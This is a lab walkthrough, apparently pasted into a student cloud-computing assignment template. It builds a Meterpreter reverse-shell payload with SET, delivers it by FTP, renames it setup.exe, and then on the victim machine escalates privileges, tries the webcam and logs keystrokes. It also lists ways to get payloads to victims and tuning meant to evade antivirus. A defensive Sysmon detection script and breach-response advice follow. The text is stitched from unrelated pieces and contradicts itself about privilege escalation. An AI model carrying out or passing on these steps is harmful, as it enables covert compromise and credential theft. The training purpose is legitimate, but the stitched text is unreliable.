Type the following password in the Password text box and click Sign In:
Passw0rd
Figure 1.2 Screenshot of PLABKALI01: Entering the password in the Password text box and then
clicking Sign In.
Ensure that you have logged into the Kali Linux system.
Project assignment: Project assignment title
First and last name, index number
CS450 – Cloud Computing
Figure 1.3 Screenshot of PLABKALI01: Showing the taskbar that is correctly displayed once the
viewer has been moved.
Step 2
You can start SET either from the menu or from the command prompt. To start from the menu, click
the first icon from the task bar, select Exploitation Tools, and then select social engineering toolkit.
In this lab, you will use a command to start SET. On the toolbar, double-click Root Terminal.
Step 3
The terminal window is displayed. Enter the following command and press Enter:
setoolkit
Step 4
If you are using SET for the first time, you need to accept the terms of service. Type the following
letter and press Enter:
y
Figure 1.6 Screenshot of PLABKALI01: Accepting the terms of service to start the Social Engineering
Toolkit (SET).
Step 5
You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting the option 5.
To continue with this lab, you will need to select the 1) Social-Engineering Attacks option. Type the
following number and press Enter:
1
Figure 1.7 Screenshot of PLABKALI01: Selecting the option 1 to choose the Social-Engineering
Attacks.
Step 6
Next, you will see another menu that relates to the Social-Engineering Attacks option. Out of the given
choices, choose 4) Create a Payload and Listener. Type the following number and press Enter:
4
Figure 1.8 Screenshot of PLABKALI01: Selecting the option 4 to create a payload and listener.
Step 7
Next, you will be prompted to select a payload. Out of the given choices, choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number and press Enter:
5
Figure 1.9 Screenshot of PLABKALI01: Selecting the option 5 to choose Windows Meterpreter
Reverse payload.
Step 8
You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux. In this lab environment, the IP address for the Kali Linux is
192.168.0.3.
For the IP address for the payload listener option, enter the following IP address and press Enter:
192.168.0.3
Note: In a real environment you will have a different IP address. Do not use this one; it applies only to
this lab environment. If you do not know the IP address of your Kali Linux, open another terminal
window and run ifconfig (or ip addr). If you know the network adapter name, you can run ifconfig eth0,
where eth0 is the name of the adapter; check which name your system uses.
Figure 1.10 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.
Step 9
Next, you will be prompted to enter the port number. Port 443 is a common choice for a reverse listener
because outbound HTTPS is allowed through most firewalls, so the callback blends in with normal web
traffic. Type the following port number in the Enter the PORT for the reverse listener option and press
Enter:
443
Figure 1.11 Screenshot of PLABKALI01: Entering the port number for the reverse listener.
Step 10
Notice that the backdooring a legit executable process starts. SET packages the Meterpreter payload
into an executable using techniques intended to evade antivirus signatures; treat this as best effort,
since current antivirus and EDR products frequently still flag SET's default output. After the executable
is created, it is stored in /root/.set. The default name for the file is payload.exe, which you will change
after transporting it to the victim's system.
You are now prompted to start the payload and listener. Type the following and press Enter:
yes
Figure 1.12 Screenshot of PLABKALI01: Entering YES to start the payload and listener.
The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.
Figure 1.13 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:
E-mail - attach the payload with an E-mail and send it to the victim.
USB - copy the payload in a USB and when the victim plugs-in the USB in the system, it can be
triggered.
Download - keep the infected file in a download repository from where the victim downloads
the payload.
FTP - Share it through FTP - making it look like a legitimate file.
In this task, you will setup an FTP server and share the file with the victim.
Step 1
Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.
Figure 1.14 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Step 2
Next, you need to first setup an FTP server. There are multiple options. Either you can setup an
independent FTP server or use an auxiliary FTP server of the Metasploit. To setup the FTP server, type
the following command and press Enter:
use auxiliary/server/ftp
Figure 1.15 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.
Step 3
Notice that the command prompt has now changed to msf auxiliary(ftp). You need to set the FTP root
directory to the folder where SET stored the payload. To do this, type the following command and press
Enter:
set FTPROOT /root/.set
Figure 1.16 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.
Step 4
Next, start the server. Type the following command and press Enter:
exploit
Note: If you miss this step, you will not be able to connect to the FTP server. This is a critical step. The
module listens on TCP port 21 by default and, in this lab, accepts the anonymous login with a blank
password that you will use in the next task; run show options first if you need to confirm the FTPROOT
and port settings.
Step 5
Connect to PLABWIN10.
Figure 1.18 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Leave the devices you have powered on in their current state and proceed to the next task.
After you have set up the FTP server, you next need to download the file onto the victim's system. You
do not need a separate FTP client to download the file. In this task, you will use the ftp client built into
the Windows command prompt to connect to the FTP server.
Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.
Step 1
Figure 1.19 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Step 2
Figure 1.20 Screenshot of PLABWIN10: Selecting the Run options from the menu.
Step 3
The Run dialog box is displayed. In the Open textbox, type the following and press Enter:
cmd
Figure 1.21 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.
Step 4
The command prompt window is displayed. You will now connect with the FTP server and download
the file.
To connect with the FTP server, type the following command and press Enter:
ftp 192.168.0.3
Figure 1.22 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.3.
Step 5
You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User and press Enter:
anonymous
Figure 1.23 Screenshot of PLABWIN10: Entering the user name as Anonymous to connect with the
FTP server.
Step 6
Next, you are prompted for the password. Leave it blank and press Enter.
Figure 1.24 Screenshot of PLABWIN10: Entering the password to authenticate the Anonymous user.
Figure 1.25 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.3.
Step 7
You need to now list the files on the FTP server. To be able to do this, type the following command
and press Enter:
dir
Figure 1.26 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.3.
Step 8
Now, set the transfer to binary. Type the following command and press Enter:
binary
Step 9
Next, transfer the file on to the victim’s system. Type the following command and press Enter:
get payload.exe
Figure 1.28 Screenshot of PLABWIN10: Downloading the payload.exe file using the GET command.
Step 10
You can now close the FTP session. Type the following command and press Enter:
quit
Notice that the FTP prompt is no longer available. You are back at the command prompt.
Figure 1.29 Screenshot of PLABWIN10: Closing the session with the FTP server using the quit
command.
Step 11
Open the Windows Explorer from the taskbar and navigate to the following path:
C:\Users\administrator.PRACTICELABS
Figure 1.30 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Windows system.
Step 12
Move the file to the Downloads folder by dragging it. You should then see the file in the Downloads
folder.
Figure 1.31 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.
Step 13
Navigate to the Downloads folder. Notice that the payload.exe is now present in this folder.
Figure 1.32 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.
Step 14
After the file is moved, rename it to setup.exe. Then, double-click the file to execute it.
Switch back to PLABKALI01. Notice that a session with the victim's system has already been
opened.
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.
Figure 1.34 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.
The payload is now running on the victim’s system. You need to now exploit the victim’s system.
Step 1
Ensure that you are connected to PLABKALI01. You now need to open the session with the victim's
system. Type the following command and press Enter:
sessions -i 1
Figure 1.35 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.
Step 2
Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.
ps
Notice that the processes running on the victim’s system are now displayed. It is important to note the
last running process, setup.exe, which is the payload that you have executed on the victim’s system.
Figure 1.36 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.
Step 3
Next, you need to escalate privileges. Type the following command and press Enter:
getsystem
Figure 1.37 Screenshot of PLABKALI01: Executing the getsystem command to escalate privileges on
the victim’s system.
Step 4
Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command and press Enter:
webcam_snap
Notice the output, which states that victim’s system does not have a webcam.
Figure 1.38 Screenshot of PLABKALI01: Using the webcam on the victim’s system to take a picture.
Step 5
Let’s try to capture the keystrokes on the victim’s system. Type the following command and press
Enter:
keyscan_start
Figure 1.39 Screenshot of PLABKALI01: Starting the keystroke sniffer on the victim’s system.
Step 6
Let’s now see the keys that have been pressed on the victim’s system. Type the following command
and press Enter:
keyscan_dump
Notice that several keys were pressed since the sniffer has started.
Figure 1.40 Screenshot of PLABKALI01: Capturing the keystrokes on the victim’s system.
Step 7
Since the privilege escalation failed, you can try something else with the system. First, put the session
into the background. Type the following command and press Enter:
background
Notice that session 1 is now running in the background. From here you can run further modules against
it if you wish. There are many options available, and you can explore them in your free time.
Figure 1.41 Screenshot of PLABKALI01: Putting the session into the background.
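From the defender's side, as an added example that is not part of the lab: the callback you just received is a process launched from the user's Downloads folder opening an outbound connection on 443, which is exactly what a rule over Sysmon Event ID 3 (network connection) records can flag, and the anonymous FTP download that delivered it leaves a second trace. The events below are constructed to mirror this exercise, not real telemetry; the field names follow Sysmon, while the rule names and the user-writable-path pattern are this example's own assumptions.

```python
"""Host-side detection of the reverse-shell behaviour shown in this exercise
(added example; not part of the lab). Evaluates Sysmon-style network
connection events; the events below are constructed, not real telemetry.
"""
import re

# Constructed events. setup.exe is the renamed payload.exe calling back to the
# Kali listener on 443; ftp.exe is the anonymous download that fetched it.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "User": r"PRACTICELABS\administrator", "DestinationIp": "203.0.113.10",
     "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\ftp.exe",
     "User": r"PRACTICELABS\administrator", "DestinationIp": "192.168.0.3",
     "DestinationPort": 21},
    {"EventID": 3, "Image": r"C:\Users\administrator.PRACTICELABS\Downloads\setup.exe",
     "User": r"PRACTICELABS\administrator", "DestinationIp": "192.168.0.3",
     "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM", "DestinationIp": "192.168.0.1",
     "DestinationPort": 53},
]

WEB_PORTS = {80, 443, 8080, 8443}

# Directories an ordinary user can write to (assumed list): a binary run from
# here that talks to the network deserves a look
USER_WRITABLE = re.compile(
    r"^[A-Z]:\\Users\\(?:Public|[^\\]+\\(?:Downloads|Desktop|AppData\\Local\\Temp))\\",
    re.IGNORECASE)


def user_writable(image: str) -> bool:
    """True when the executable lives in a user-writable directory."""
    return USER_WRITABLE.match(image) is not None


def evaluate(events: list) -> list:
    """Apply the rules to Sysmon-style events; return one alert per hit."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 3:
            continue
        image, port = ev["Image"], int(ev["DestinationPort"])
        dest = f"{ev['DestinationIp']}:{port}"
        if user_writable(image) and port in WEB_PORTS:
            # A reverse Meterpreter over 443 looks like HTTPS on the wire;
            # the process that opened the connection is the giveaway
            alerts.append({"rule": "user-writable-binary-web-egress",
                           "severity": "high", "image": image, "dest": dest})
        if port == 21:
            # Cleartext FTP from a workstation is rare enough to review
            alerts.append({"rule": "cleartext-ftp-client",
                           "severity": "medium", "image": image, "dest": dest})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

Firefox's connection to 443 passes because it runs from Program Files, and svchost's DNS lookup matches neither rule; only the renamed payload and the ftp.exe transfer are raised. Port choice alone would not have separated setup.exe from the browser, which is the point of the lab's use of 443.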
Shut down all virtual machines used in this lab before proceeding to the next module. Alternatively,
you can log out of the lab platform.
Summary
You covered the following activities in this module:
It is important to understand that the impact of a breach is not only technical (stolen data, damaged
databases, loss of intellectual property); the damage also extends to the company's reputation.
Responding to a data breach is a very dynamic process.
Below are some important measures a company should take when a security breach is identified, according to
many security experts:
Communicate the issue. Internally, employees should be informed of the problem and called to action.
Externally, clients should be informed through direct communication and official announcements.
Communication creates transparency, which is crucial in this type of situation.
Provide details. Explain why the situation took place and what was compromised. It is also expected that the
company covers the cost of identity theft protection services for affected customers.
Understand what caused and facilitated the breach. If necessary, hire forensics experts to research and learn
the details.
Apply what was learned from the forensics investigation to ensure similar breaches do not happen in the
future.
Ensure all systems are clean, no backdoors were installed, and nothing else has been compromised.
Attackers will often try to leave a backdoor to facilitate future breaches. Make sure this does not happen.
8 CONCLUSION
In the conclusion, look back at each chapter and write a short summary of it and of the complete paper.
9 REFERENCES
10 APPENDICES
10.1 APPENDIX 1
10.2 APPENDIX 2